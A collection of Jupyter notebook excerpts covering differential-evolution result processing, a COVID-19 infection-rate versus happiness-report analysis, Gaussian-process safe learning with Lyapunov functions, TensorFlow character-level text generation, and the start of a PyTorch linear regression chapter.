dt = get_merged_dt_v4(sdis, F, CR, popsize)
dt.to_csv(f"{output_location}DE_{sdis}_p{popsize}_F{F}CR{CR}_cosine_v4.csv")
def get_diversity_dt(sdis, F, CR, popsize):
dt_large = pd.DataFrame()
files = glob.glob(f"/mnt/e/Research/DE/Div_cos_sim/CosineSimilarity/7/Diversity-DErob{sdis}p{popsize}D30f0*_F{F}Cr{CR}.txt")
if len(files) == 0:
return dt_large
for f in files:
dt_temp = pd.read_csv(f, sep=' ', header=None, skiprows=1)
dt_large = dt_large.append(dt_temp)
dt_large['sdis'] = sdis
dt_large['F'] = F
dt_large['CR'] = CR
dt_large['popsize'] = popsize
dt_large.columns = ['div0', 'div1', 'sdis', 'F', 'CR', 'popsize']
return dt_large
for F in ['0755','0285', '099', '052', '005']:
for CR in ['0755', '0285', '099', '052', '005', '00891', '01283', '01675', '02067', '02458']:
for popsize in [5, 20, 100]:
for sdis in ['t', 'h', 'm', 's', 'c', 'u']:
dt = get_diversity_dt(sdis, F, CR, popsize)
dt.to_csv(f"{output_location}DE_{sdis}_p{popsize}_F{F}CR{CR}_diversity.csv")
```
|
github_jupyter
|
# Welcome to Covid19 Data Analysis Notebook
------------------------------------------
### Let's Import the modules
```
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
```
## Task 2
### Task 2.1: importing covid19 dataset
importing "Covid19_Confirmed_dataset.csv" from "./Dataset" folder.
```
corona_dataset_csv = pd.read_csv('Datasets/covid19_Confirmed_dataset.csv')
corona_dataset_csv.head()
```
#### Let's check the shape of the dataframe
```
corona_dataset_csv.shape
```
### Task 2.2: Delete the useless columns
```
df = corona_dataset_csv.drop(['Lat','Long'],axis = 1)
df.head()
# if we want to change original file:
corona_dataset_csv = pd.read_csv('Datasets/covid19_Confirmed_dataset.csv')
corona_dataset_csv.drop(['Lat','Long'],axis=1,inplace=True)
corona_dataset_csv.head(10)
```
### Task 2.3: Aggregating the rows by the country
```
corona_dataset_aggregated = corona_dataset_csv.groupby("Country/Region").sum()
corona_dataset_aggregated.head(10)
corona_dataset_aggregated.shape
```
### Task 2.4: Visualizing data related to a country for example China
visualization always helps for better understanding of our data.
```
corona_dataset_aggregated.loc['China']
corona_dataset_aggregated.loc['China'].plot() # locate
corona_dataset_aggregated.loc['Italy'].plot()
corona_dataset_aggregated.loc['US'].plot()
plt.legend()
```
### Task3: Calculating a good measure
we need to find a good measure reperestend as a number, describing the spread of the virus in a country.
```
corona_dataset_aggregated.loc['China'].plot()
corona_dataset_aggregated.loc['China'][:5].plot()
corona_dataset_aggregated.loc['China'].diff().plot()
```
### task 3.1: caculating the first derivative of the curve
```
corona_dataset_aggregated.loc['China'].diff().plot()
```
### task 3.2: find maxmimum infection rate for China
```
corona_dataset_aggregated.loc['China'].diff().max()
corona_dataset_aggregated.loc['China'].diff().argmax()
corona_dataset_aggregated.loc['China'].diff().idxmax()
```
### Task 3.3: find maximum infection rate for all of the countries.
```
corona_dataset_aggregated = corona_dataset_csv.groupby("Country/Region").sum()
countries = list(corona_dataset_aggregated.index)
max_infection_number = []
max_infection_date = []
for country in countries :
max_infection_number.append(corona_dataset_aggregated.loc[country].diff().max())
max_infection_date.append(corona_dataset_aggregated.loc[country].diff().idxmax())
corona_dataset_aggregated['max_infection_number'] = max_infection_number
corona_dataset_aggregated['max_infection_date'] = max_infection_date
corona_dataset_aggregated.head()
```
### Task 3.4: create a new dataframe with only needed column
```
corona_data = pd.DataFrame(corona_dataset_aggregated['max_infection_number'])
corona_data.head()
```
### Task4:
- Importing the WorldHappinessReport.csv dataset
- selecting needed columns for our analysis
- join the datasets
- calculate the correlations as the result of our analysis
### Task 4.1 : importing the dataset
```
world_happiness_report = pd.read_csv("Datasets/worldwide_happiness_report.csv")
world_happiness_report.head(20)
world_happiness_report.shape
```
### Task 4.2: let's drop the useless columns
```
world_happiness_report = pd.read_csv("Datasets/worldwide_happiness_report.csv")
columns_to_dropped = ['Overall rank','Score','Generosity','Perceptions of corruption']
world_happiness_report.drop(columns_to_dropped,axis=1 , inplace=True)
world_happiness_report.head()
```
### Task 4.3: changing the indices of the dataframe
```
# change index by name
world_happiness_report.set_index(['Country or region'],inplace=True)
world_happiness_report.head()
```
### Task4.4: now let's join two dataset we have prepared
#### Corona Dataset :
```
corona_data.head()
corona_data.shape
```
#### wolrd happiness report Dataset :
```
world_happiness_report.head()
world_happiness_report.shape
data1 =corona_data.join(world_happiness_report)
print(data1.shape)
data1.head()
data2 =corona_data.join(world_happiness_report, how='inner')# delete some countries not in happiness csv
print(data2.shape)
data2.head()
# add corona data in happiness, if one country in corona but not in happiness,then don't add it.
data3 = world_happiness_report.join(corona_data).copy()
print(data3.shape)
data3.head()
```
### Task 4.5: correlation matrix
```
data1.corr()
data2.corr()
data3.corr()
```
### Task 5: Visualization of the results
our Analysis is not finished unless we visualize the results in terms figures and graphs so that everyone can understand what you get out of our analysis
```
print(data2.shape)
data2.head()
```
### Task 5.1: Plotting GDP vs maximum Infection rate
```
x = data2['GDP per capita']
y = data2['max_infection_number']
plt.figure()
sns.scatterplot(x,(y))# 散点图
plt.figure()
sns.scatterplot(x,np.log(y))# 散点图
sns.regplot(x,np.log(y))
```
### Task 5.2: Plotting Social support vs maximum Infection rate
```
x = data2['Social support']
y = data2['max_infection_number']
plt.figure()
sns.scatterplot(x,(y))# 散点图
plt.figure()
sns.scatterplot(x,np.log(y))# 散点图
plt.figure()
sns.regplot(x,np.log(y))
```
### Task 5.3: Plotting Healthy life expectancy vs maximum Infection rate
```
x = data2['Healthy life expectancy']
y = data2['max_infection_number']
plt.figure()
sns.scatterplot(x,(y))# 散点图
plt.figure()
sns.scatterplot(x,np.log(y))# 散点图
plt.figure()
sns.regplot(x,np.log(y))
```
### Task 5.4: Plotting Freedom to make life choices vs maximum Infection rate
```
x = data2['Freedom to make life choices']
y = data2['max_infection_number']
plt.figure()
sns.scatterplot(x,(y))# 散点图
plt.figure()
sns.scatterplot(x,np.log(y))# 散点图
plt.figure()
sns.regplot(x,np.log(y))
```
|
github_jupyter
|
# Stability verification of a fixed uncertain system (without dynamic programming)
```
from __future__ import division, print_function
import tensorflow as tf
import gpflow
import numpy as np
import matplotlib.pyplot as plt
from future.builtins import *
from functools import partial
%matplotlib inline
import plotting
import safe_learning
try:
session.close()
except NameError:
pass
graph = tf.Graph()
session = tf.InteractiveSession(graph=graph)
session.run(tf.global_variables_initializer())
```
We start by defining a discretization of the space $[-1, 1]$ with discretization constant $\tau$
```
discretization = safe_learning.GridWorld([-1, 1], 1001)
tau = 1 / discretization.nindex
print('Grid size: {0}'.format(discretization.nindex))
```
We define the GP model using one particular sample of the GP, in addition to a stable, closed-loop, linear model.
$$x_{l+1} = 0.25 x_k + g_\pi(x),$$
The prior dynamics are locally asymptotically stable. Moreover, in the one-dimensional case, the dynamics are stable as long as $|x_{k+1}| \leq |x_{k}|$.
```
# Observation noise
noise_var = 0.01 ** 2
with tf.variable_scope('gp'):
# Mean dynamics
mean_function = safe_learning.LinearSystem((0.25, 0.), name='mean_dynamics')
kernel = (gpflow.kernels.Matern32(1, lengthscales=1, variance=0.4**2, active_dims=[0])
* gpflow.kernels.Linear(1, active_dims=[0]))
gp = safe_learning.GPRCached(np.empty((0, 2), dtype=safe_learning.config.np_dtype),
np.empty((0, 1), dtype=safe_learning.config.np_dtype),
kernel,
mean_function=mean_function)
gp.likelihood.variance = noise_var
gpfun = safe_learning.GaussianProcess(gp, name='gp_dynamics')
# Define one sample as the true dynamics
np.random.seed(5)
# # Set up a discretization
sample_disc = np.hstack((np.linspace(-1, 1, 50)[:, None],
np.zeros((50, 1))))
# # Draw samples
fs = safe_learning.sample_gp_function(sample_disc, gpfun, number=10, return_function=False)
plt.plot(sample_disc[:, 0], fs.T)
plt.ylabel('$g(x)$')
plt.xlabel('x')
plt.title('Samples drawn from the GP model of the dynamics')
plt.show()
true_dynamics = safe_learning.sample_gp_function(
sample_disc,
gpfun)[0]
# Plot the basic model
with tf.variable_scope('plot_true_dynamics'):
true_y = true_dynamics(sample_disc, noise=False).eval(feed_dict=true_dynamics.feed_dict)
plt.plot(sample_disc[:, 0], true_y, color='black', alpha=0.8)
plt.title('GP model of the dynamics')
plt.show()
# lyapunov_function = safe_learning.QuadraticFunction(np.array([[1]]))
lyapunov_disc = safe_learning.GridWorld([-1., 1.], 3)
lyapunov_function = safe_learning.Triangulation(lyapunov_disc, [1, 0, 1], name='lyapunov_function')
dynamics = gpfun
policy = safe_learning.LinearSystem(np.array([0.]), name='policy')
# Lipschitz constant
# L_dyn = 0.25 + dynamics.beta(0) * np.sqrt(gp.kern.Mat32.variance) / gp.kern.Mat32.lengthscale * np.max(np.abs(extent))
# L_V = np.max(lyapunov_function.gradient(grid))
L_dyn = 0.25
L_V = 1.
lyapunov = safe_learning.Lyapunov(discretization, lyapunov_function, dynamics, L_dyn, L_V, tau, policy)
# Specify the desired accuracy
# accuracy = np.max(lyapunov.V) / 1e10
```
## Safety based on GP model
Let's start by plotting the prior over the dynamics and the associated prior over $\dot{V}(x)$.
```
lyapunov.update_safe_set()
plotting.plot_lyapunov_1d(lyapunov, true_dynamics, legend=True)
```
Clearly the model does not allow us to classify any states as safe ($\dot{V} < -L \tau$). However, as a starting point, we assume that we know that the system is asymptotially stable within some initial set, $\mathcal{S}_0$:
$$\mathcal{S}_0 = \{ x \in \mathbb{R} \,|\, |x| < 0.2 \}$$
```
lyapunov.initial_safe_set = np.abs(lyapunov.discretization.all_points.squeeze()) < 0.2
```
## Online learning
As we sample within this initial safe set, we gain more knowledge about the system. In particular, we iteratively select the state withing the safe set, $\mathcal{S}_n$, where the dynamics are the most uncertain (highest variance).
```
grid = lyapunov.discretization.all_points
lyapunov.update_safe_set()
with tf.variable_scope('sample_new_safe_point'):
safe_set = tf.placeholder(safe_learning.config.dtype, [None, None])
_, dynamics_std_tf = lyapunov.dynamics(safe_set, lyapunov.policy(safe_set))
tf_max_state = tf.placeholder(safe_learning.config.dtype, [1, None])
tf_max_action = lyapunov.policy(tf_max_state)
tf_measurement = true_dynamics(tf_max_state, tf_max_action)
feed_dict = lyapunov.dynamics.feed_dict
def update_gp():
"""Update the GP model based on an actively selected data point."""
# Maximum uncertainty in safe set
safe_grid = grid[lyapunov.safe_set]
feed_dict[safe_set] = safe_grid
dynamics_std = dynamics_std_tf.eval(feed_dict=feed_dict)
max_id = np.argmax(dynamics_std)
max_state = safe_grid[[max_id], :].copy()
feed_dict[tf_max_state] = max_state
max_action, measurement = session.run([tf_max_action, tf_measurement],
feed_dict=feed_dict)
arg = np.hstack((max_state, max_action))
lyapunov.dynamics.add_data_point(arg, measurement)
lyapunov.update_safe_set()
# Update the GP model a couple of times
for i in range(4):
update_gp()
# Plot the new safe set
plotting.plot_lyapunov_1d(lyapunov, true_dynamics, legend=True)
```
We continue to sample like this, until we find the maximum safe set
```
for i in range(20):
update_gp()
lyapunov.update_safe_set()
plotting.plot_lyapunov_1d(lyapunov, true_dynamics, legend=False)
plotting.show_graph(tf.get_default_graph())
```
|
github_jupyter
|
##### Copyright 2019 The TensorFlow Authors.
```
#@title Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
```
# Text generation with an RNN
<table class="tfo-notebook-buttons" align="left">
<td>
<a target="_blank" href="https://www.tensorflow.org/tutorials/text/text_generation"><img src="https://www.tensorflow.org/images/tf_logo_32px.png" />View on TensorFlow.org</a>
</td>
<td>
<a target="_blank" href="https://colab.research.google.com/github/tensorflow/docs/blob/master/site/en/tutorials/text/text_generation.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />Run in Google Colab</a>
</td>
<td>
<a target="_blank" href="https://github.com/tensorflow/docs/blob/master/site/en/tutorials/text/text_generation.ipynb"><img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />View source on GitHub</a>
</td>
<td>
<a href="https://storage.googleapis.com/tensorflow_docs/docs/site/en/tutorials/text/text_generation.ipynb"><img src="https://www.tensorflow.org/images/download_logo_32px.png" />Download notebook</a>
</td>
</table>
This tutorial demonstrates how to generate text using a character-based RNN. You will work with a dataset of Shakespeare's writing from Andrej Karpathy's [The Unreasonable Effectiveness of Recurrent Neural Networks](http://karpathy.github.io/2015/05/21/rnn-effectiveness/). Given a sequence of characters from this data ("Shakespear"), train a model to predict the next character in the sequence ("e"). Longer sequences of text can be generated by calling the model repeatedly.
Note: Enable GPU acceleration to execute this notebook faster. In Colab: *Runtime > Change runtime type > Hardware accelerator > GPU*.
This tutorial includes runnable code implemented using [tf.keras](https://www.tensorflow.org/programmers_guide/keras) and [eager execution](https://www.tensorflow.org/programmers_guide/eager). The following is sample output when the model in this tutorial trained for 30 epochs, and started with the prompt "Q":
<pre>
QUEENE:
I had thought thou hadst a Roman; for the oracle,
Thus by All bids the man against the word,
Which are so weak of care, by old care done;
Your children were in your holy love,
And the precipitation through the bleeding throne.
BISHOP OF ELY:
Marry, and will, my lord, to weep in such a one were prettiest;
Yet now I was adopted heir
Of the world's lamentable day,
To watch the next way with his father with his face?
ESCALUS:
The cause why then we are all resolved more sons.
VOLUMNIA:
O, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, it is no sin it should be dead,
And love and pale as any will to that word.
QUEEN ELIZABETH:
But how long have I heard the soul for this world,
And show his hands of life be proved to stand.
PETRUCHIO:
I say he look'd on, if I must be content
To stay him from the fatal of our country's bliss.
His lordship pluck'd from this sentence then for prey,
And then let us twain, being the moon,
were she such a case as fills m
</pre>
While some of the sentences are grammatical, most do not make sense. The model has not learned the meaning of words, but consider:
* The model is character-based. When training started, the model did not know how to spell an English word, or that words were even a unit of text.
* The structure of the output resembles a play—blocks of text generally begin with a speaker name, in all capital letters similar to the dataset.
* As demonstrated below, the model is trained on small batches of text (100 characters each), and is still able to generate a longer sequence of text with coherent structure.
## Setup
### Import TensorFlow and other libraries
```
import tensorflow as tf
from tensorflow.keras.layers.experimental import preprocessing
import numpy as np
import os
import time
```
### Download the Shakespeare dataset
Change the following line to run this code on your own data.
```
path_to_file = tf.keras.utils.get_file('shakespeare.txt', 'https://storage.googleapis.com/download.tensorflow.org/data/shakespeare.txt')
```
### Read the data
First, look in the text:
```
# Read, then decode for py2 compat.
text = open(path_to_file, 'rb').read().decode(encoding='utf-8')
# length of text is the number of characters in it
print('Length of text: {} characters'.format(len(text)))
# Take a look at the first 250 characters in text
print(text[:250])
# The unique characters in the file
vocab = sorted(set(text))
print('{} unique characters'.format(len(vocab)))
```
## Process the text
### Vectorize the text
Before training, you need to convert the strings to a numerical representation.
The `preprocessing.StringLookup` layer can convert each character into a numeric ID. It just needs the text to be split into tokens first.
```
example_texts = ['abcdefg', 'xyz']
chars = tf.strings.unicode_split(example_texts, input_encoding='UTF-8')
chars
```
Now create the `preprocessing.StringLookup` layer:
```
ids_from_chars = preprocessing.StringLookup(
vocabulary=list(vocab))
```
It converts form tokens to character IDs, padding with `0`:
```
ids = ids_from_chars(chars)
ids
```
Since the goal of this tutorial is to generate text, it will also be important to invert this representation and recover human-readable strings from it. For this you can use `preprocessing.StringLookup(..., invert=True)`.
Note: Here instead of passing the original vocabulary generated with `sorted(set(text))` use the `get_vocabulary()` method of the `preprocessing.StringLookup` layer so that the padding and `[UNK]` tokens are set the same way.
```
chars_from_ids = tf.keras.layers.experimental.preprocessing.StringLookup(
vocabulary=ids_from_chars.get_vocabulary(), invert=True)
```
This layer recovers the characters from the vectors of IDs, and returns them as a `tf.RaggedTensor` of characters:
```
chars = chars_from_ids(ids)
chars
```
You can `tf.strings.reduce_join` to join the characters back into strings.
```
tf.strings.reduce_join(chars, axis=-1).numpy()
def text_from_ids(ids):
return tf.strings.reduce_join(chars_from_ids(ids), axis=-1)
```
### The prediction task
Given a character, or a sequence of characters, what is the most probable next character? This is the task you're training the model to perform. The input to the model will be a sequence of characters, and you train the model to predict the output—the following character at each time step.
Since RNNs maintain an internal state that depends on the previously seen elements, given all the characters computed until this moment, what is the next character?
### Create training examples and targets
Next divide the text into example sequences. Each input sequence will contain `seq_length` characters from the text.
For each input sequence, the corresponding targets contain the same length of text, except shifted one character to the right.
So break the text into chunks of `seq_length+1`. For example, say `seq_length` is 4 and our text is "Hello". The input sequence would be "Hell", and the target sequence "ello".
To do this first use the `tf.data.Dataset.from_tensor_slices` function to convert the text vector into a stream of character indices.
```
all_ids = ids_from_chars(tf.strings.unicode_split(text, 'UTF-8'))
all_ids
ids_dataset = tf.data.Dataset.from_tensor_slices(all_ids)
for ids in ids_dataset.take(10):
print(chars_from_ids(ids).numpy().decode('utf-8'))
seq_length = 100
examples_per_epoch = len(text)//(seq_length+1)
```
The `batch` method lets you easily convert these individual characters to sequences of the desired size.
```
sequences = ids_dataset.batch(seq_length+1, drop_remainder=True)
for seq in sequences.take(1):
print(chars_from_ids(seq))
```
It's easier to see what this is doing if you join the tokens back into strings:
```
for seq in sequences.take(5):
print(text_from_ids(seq).numpy())
```
For training you'll need a dataset of `(input, label)` pairs. Where `input` and
`label` are sequences. At each time step the input is the current character and the label is the next character.
Here's a function that takes a sequence as input, duplicates, and shifts it to align the input and label for each timestep:
```
def split_input_target(sequence):
input_text = sequence[:-1]
target_text = sequence[1:]
return input_text, target_text
split_input_target(list("Tensorflow"))
dataset = sequences.map(split_input_target)
for input_example, target_example in dataset.take(1):
print("Input :", text_from_ids(input_example).numpy())
print("Target:", text_from_ids(target_example).numpy())
```
### Create training batches
You used `tf.data` to split the text into manageable sequences. But before feeding this data into the model, you need to shuffle the data and pack it into batches.
```
# Batch size
BATCH_SIZE = 64
# Buffer size to shuffle the dataset
# (TF data is designed to work with possibly infinite sequences,
# so it doesn't attempt to shuffle the entire sequence in memory. Instead,
# it maintains a buffer in which it shuffles elements).
BUFFER_SIZE = 10000
dataset = (
dataset
.shuffle(BUFFER_SIZE)
.batch(BATCH_SIZE, drop_remainder=True)
.prefetch(tf.data.experimental.AUTOTUNE))
dataset
```
## Build The Model
This section defines the model as a `keras.Model` subclass (For details see [Making new Layers and Models via subclassing](https://www.tensorflow.org/guide/keras/custom_layers_and_models)).
This model has three layers:
* `tf.keras.layers.Embedding`: The input layer. A trainable lookup table that will map each character-ID to a vector with `embedding_dim` dimensions;
* `tf.keras.layers.GRU`: A type of RNN with size `units=rnn_units` (You can also use an LSTM layer here.)
* `tf.keras.layers.Dense`: The output layer, with `vocab_size` outputs. It outpts one logit for each character in the vocabulary. These are the log-liklihood of each character according to the model.
```
# Length of the vocabulary in chars
vocab_size = len(vocab)
# The embedding dimension
embedding_dim = 256
# Number of RNN units
rnn_units = 1024
class MyModel(tf.keras.Model):
def __init__(self, vocab_size, embedding_dim, rnn_units):
super().__init__(self)
self.embedding = tf.keras.layers.Embedding(vocab_size, embedding_dim)
self.gru = tf.keras.layers.GRU(rnn_units,
return_sequences=True,
return_state=True)
self.dense = tf.keras.layers.Dense(vocab_size)
def call(self, inputs, states=None, return_state=False, training=False):
x = inputs
x = self.embedding(x, training=training)
if states is None:
states = self.gru.get_initial_state(x)
x, states = self.gru(x, initial_state=states, training=training)
x = self.dense(x, training=training)
if return_state:
return x, states
else:
return x
model = MyModel(
# Be sure the vocabulary size matches the `StringLookup` layers.
vocab_size=len(ids_from_chars.get_vocabulary()),
embedding_dim=embedding_dim,
rnn_units=rnn_units)
```
For each character the model looks up the embedding, runs the GRU one timestep with the embedding as input, and applies the dense layer to generate logits predicting the log-likelihood of the next character:

Note: For training you could use a `keras.Sequential` model here. To generate text later you'll need to manage the RNN's internal state. It's simpler to include the state input and output options upfront, than it is to rearrange the model architecture later. For more details asee the [Keras RNN guide](https://www.tensorflow.org/guide/keras/rnn#rnn_state_reuse).
## Try the model
Now run the model to see that it behaves as expected.
First check the shape of the output:
```
for input_example_batch, target_example_batch in dataset.take(1):
example_batch_predictions = model(input_example_batch)
print(example_batch_predictions.shape, "# (batch_size, sequence_length, vocab_size)")
```
In the above example the sequence length of the input is `100` but the model can be run on inputs of any length:
```
model.summary()
```
To get actual predictions from the model you need to sample from the output distribution, to get actual character indices. This distribution is defined by the logits over the character vocabulary.
Note: It is important to _sample_ from this distribution as taking the _argmax_ of the distribution can easily get the model stuck in a loop.
Try it for the first example in the batch:
```
sampled_indices = tf.random.categorical(example_batch_predictions[0], num_samples=1)
sampled_indices = tf.squeeze(sampled_indices,axis=-1).numpy()
```
This gives us, at each timestep, a prediction of the next character index:
```
sampled_indices
```
Decode these to see the text predicted by this untrained model:
```
print("Input:\n", text_from_ids(input_example_batch[0]).numpy())
print()
print("Next Char Predictions:\n", text_from_ids(sampled_indices).numpy())
```
## Train the model
At this point the problem can be treated as a standard classification problem. Given the previous RNN state, and the input this time step, predict the class of the next character.
### Attach an optimizer, and a loss function
The standard `tf.keras.losses.sparse_categorical_crossentropy` loss function works in this case because it is applied across the last dimension of the predictions.
Because your model returns logits, you need to set the `from_logits` flag.
```
loss = tf.losses.SparseCategoricalCrossentropy(from_logits=True)
example_batch_loss = loss(target_example_batch, example_batch_predictions)
mean_loss = example_batch_loss.numpy().mean()
print("Prediction shape: ", example_batch_predictions.shape, " # (batch_size, sequence_length, vocab_size)")
print("Mean loss: ", mean_loss)
```
A newly initialized model shouldn't be too sure of itself, the output logits should all have similar magnitudes. To confirm this you can check that the exponential of the mean loss is approximately equal to the vocabulary size. A much higher loss means the model is sure of its wrong answers, and is badly initialized:
```
tf.exp(mean_loss).numpy()
```
Configure the training procedure using the `tf.keras.Model.compile` method. Use `tf.keras.optimizers.Adam` with default arguments and the loss function.
```
model.compile(optimizer='adam', loss=loss)
```
### Configure checkpoints
Use a `tf.keras.callbacks.ModelCheckpoint` to ensure that checkpoints are saved during training:
```
# Directory where the checkpoints will be saved
checkpoint_dir = './training_checkpoints'
# Name of the checkpoint files
checkpoint_prefix = os.path.join(checkpoint_dir, "ckpt_{epoch}")
checkpoint_callback = tf.keras.callbacks.ModelCheckpoint(
filepath=checkpoint_prefix,
save_weights_only=True)
```
### Execute the training
To keep training time reasonable, use 10 epochs to train the model. In Colab, set the runtime to GPU for faster training.
```
EPOCHS = 20
history = model.fit(dataset, epochs=EPOCHS, callbacks=[checkpoint_callback])
```
## Generate text
The simplest way to generate text with this model is to run it in a loop, and keep track of the model's internal state as you execute it.

Each time you call the model you pass in some text and an internal state. The model returns a prediction for the next character and its new state. Pass the prediction and state back in to continue generating text.
The following makes a single step prediction:
```
class OneStep(tf.keras.Model):
def __init__(self, model, chars_from_ids, ids_from_chars, temperature=1.0):
super().__init__()
self.temperature=temperature
self.model = model
self.chars_from_ids = chars_from_ids
self.ids_from_chars = ids_from_chars
# Create a mask to prevent "" or "[UNK]" from being generated.
skip_ids = self.ids_from_chars(['','[UNK]'])[:, None]
sparse_mask = tf.SparseTensor(
# Put a -inf at each bad index.
values=[-float('inf')]*len(skip_ids),
indices = skip_ids,
# Match the shape to the vocabulary
dense_shape=[len(ids_from_chars.get_vocabulary())])
self.prediction_mask = tf.sparse.to_dense(sparse_mask)
@tf.function
def generate_one_step(self, inputs, states=None):
# Convert strings to token IDs.
input_chars = tf.strings.unicode_split(inputs, 'UTF-8')
input_ids = self.ids_from_chars(input_chars).to_tensor()
# Run the model.
# predicted_logits.shape is [batch, char, next_char_logits]
predicted_logits, states = self.model(inputs=input_ids, states=states,
return_state=True)
# Only use the last prediction.
predicted_logits = predicted_logits[:, -1, :]
predicted_logits = predicted_logits/self.temperature
# Apply the prediction mask: prevent "" or "[UNK]" from being generated.
predicted_logits = predicted_logits + self.prediction_mask
# Sample the output logits to generate token IDs.
predicted_ids = tf.random.categorical(predicted_logits, num_samples=1)
predicted_ids = tf.squeeze(predicted_ids, axis=-1)
# Convert from token ids to characters
predicted_chars = self.chars_from_ids(predicted_ids)
# Return the characters and model state.
return predicted_chars, states
one_step_model = OneStep(model, chars_from_ids, ids_from_chars)
```
Run it in a loop to generate some text. Looking at the generated text, you'll see the model knows when to capitalize, make paragraphs and imitates a Shakespeare-like writing vocabulary. With the small number of training epochs, it has not yet learned to form coherent sentences.
```
start = time.time()
states = None
next_char = tf.constant(['ROMEO:'])
result = [next_char]
for n in range(1000):
next_char, states = one_step_model.generate_one_step(next_char, states=states)
result.append(next_char)
result = tf.strings.join(result)
end = time.time()
print(result[0].numpy().decode('utf-8'), '\n\n' + '_'*80)
print(f"\nRun time: {end - start}")
```
The easiest thing you can do to improve the results is to train it for longer (try `EPOCHS = 30`).
You can also experiment with a different start string, try adding another RNN layer to improve the model's accuracy, or adjust the temperature parameter to generate more or less random predictions.
If you want the model to generate text *faster* the easiest thing you can do is batch the text generation. In the example below the model generates 5 outputs in about the same time it took to generate 1 above.
```
start = time.time()
states = None
next_char = tf.constant(['ROMEO:', 'ROMEO:', 'ROMEO:', 'ROMEO:', 'ROMEO:'])
result = [next_char]
for n in range(1000):
next_char, states = one_step_model.generate_one_step(next_char, states=states)
result.append(next_char)
result = tf.strings.join(result)
end = time.time()
print(result, '\n\n' + '_'*80)
print(f"\nRun time: {end - start}")
```
## Export the generator
This single-step model can easily be [saved and restored](https://www.tensorflow.org/guide/saved_model), allowing you to use it anywhere a `tf.saved_model` is accepted.
```
tf.saved_model.save(one_step_model, 'one_step')
one_step_reloaded = tf.saved_model.load('one_step')
states = None
next_char = tf.constant(['ROMEO:'])
result = [next_char]
for n in range(100):
next_char, states = one_step_reloaded.generate_one_step(next_char, states=states)
result.append(next_char)
print(tf.strings.join(result)[0].numpy().decode("utf-8"))
```
## Advanced: Customized Training
The above training procedure is simple, but does not give you much control.
It uses teacher-forcing which prevents bad predictions from being fed back to the model so the model never learns to recover from mistakes.
So now that you've seen how to run the model manually next you'll implement the training loop. This gives a starting point if, for example, you want to implement _curriculum learning_ to help stabilize the model's open-loop output.
The most important part of a custom training loop is the train step function.
Use `tf.GradientTape` to track the gradients. You can learn more about this approach by reading the [eager execution guide](https://www.tensorflow.org/guide/eager).
The basic procedure is:
1. Execute the model and calculate the loss under a `tf.GradientTape`.
2. Calculate the updates and apply them to the model using the optimizer.
```
class CustomTraining(MyModel):
@tf.function
def train_step(self, inputs):
inputs, labels = inputs
with tf.GradientTape() as tape:
predictions = self(inputs, training=True)
loss = self.loss(labels, predictions)
grads = tape.gradient(loss, model.trainable_variables)
self.optimizer.apply_gradients(zip(grads, model.trainable_variables))
return {'loss': loss}
```
The above implementation of the `train_step` method follows [Keras' `train_step` conventions](https://www.tensorflow.org/guide/keras/customizing_what_happens_in_fit). This is optional, but it allows you to change the behavior of the train step and still use keras' `Model.compile` and `Model.fit` methods.
```
model = CustomTraining(
vocab_size=len(ids_from_chars.get_vocabulary()),
embedding_dim=embedding_dim,
rnn_units=rnn_units)
model.compile(optimizer = tf.keras.optimizers.Adam(),
loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True))
model.fit(dataset, epochs=1)
```
Or if you need more control, you can write your own complete custom training loop:
```
EPOCHS = 10
mean = tf.metrics.Mean()
for epoch in range(EPOCHS):
start = time.time()
mean.reset_states()
for (batch_n, (inp, target)) in enumerate(dataset):
logs = model.train_step([inp, target])
mean.update_state(logs['loss'])
if batch_n % 50 == 0:
template = 'Epoch {} Batch {} Loss {}'
print(template.format(epoch + 1, batch_n, logs['loss']))
# saving (checkpoint) the model every 5 epochs
if (epoch + 1) % 5 == 0:
model.save_weights(checkpoint_prefix.format(epoch=epoch))
print()
print('Epoch {} Loss: {:.4f}'.format(epoch + 1, mean.result().numpy()))
print('Time taken for 1 epoch {} sec'.format(time.time() - start))
print("_"*80)
model.save_weights(checkpoint_prefix.format(epoch=epoch))
```
|
github_jupyter
|
# Deep Learning with PyTorch Step-by-Step: A Beginner's Guide
# Chapter 1
```
try:
import google.colab
import requests
url = 'https://raw.githubusercontent.com/dvgodoy/PyTorchStepByStep/master/config.py'
r = requests.get(url, allow_redirects=True)
open('config.py', 'wb').write(r.content)
except ModuleNotFoundError:
pass
from config import *
config_chapter1()
# This is needed to render the plots in this chapter
from plots.chapter1 import *
import numpy as np
from sklearn.linear_model import LinearRegression
import torch
import torch.optim as optim
import torch.nn as nn
from torchviz import make_dot
```
# A Simple Regression Problem
$$
\Large y = b + w x + \epsilon
$$
## Data Generation
### Synthetic Data Generation
```
true_b = 1
true_w = 2
N = 100
# Data Generation
np.random.seed(42)
x = np.random.rand(N, 1)
epsilon = (.1 * np.random.randn(N, 1))
y = true_b + true_w * x + epsilon
```
### Cell 1.1
```
# Shuffles the indices
idx = np.arange(N)
np.random.shuffle(idx)
# Uses first 80 random indices for train
train_idx = idx[:int(N*.8)]
# Uses the remaining indices for validation
val_idx = idx[int(N*.8):]
# Generates train and validation sets
x_train, y_train = x[train_idx], y[train_idx]
x_val, y_val = x[val_idx], y[val_idx]
figure1(x_train, y_train, x_val, y_val)
```
# Gradient Descent
## Step 0: Random Initialization
```
# Step 0 - Initializes parameters "b" and "w" randomly
np.random.seed(42)
b = np.random.randn(1)
w = np.random.randn(1)
print(b, w)
```
## Step 1: Compute Model's Predictions
```
# Step 1 - Computes our model's predicted output - forward pass
yhat = b + w * x_train
```
## Step 2: Compute the Loss
```
# Step 2 - Computing the loss
# We are using ALL data points, so this is BATCH gradient
# descent. How wrong is our model? That's the error!
error = (yhat - y_train)
# It is a regression, so it computes mean squared error (MSE)
loss = (error ** 2).mean()
print(loss)
```
## Step 3: Compute the Gradients
```
# Step 3 - Computes gradients for both "b" and "w" parameters
b_grad = 2 * error.mean()
w_grad = 2 * (x_train * error).mean()
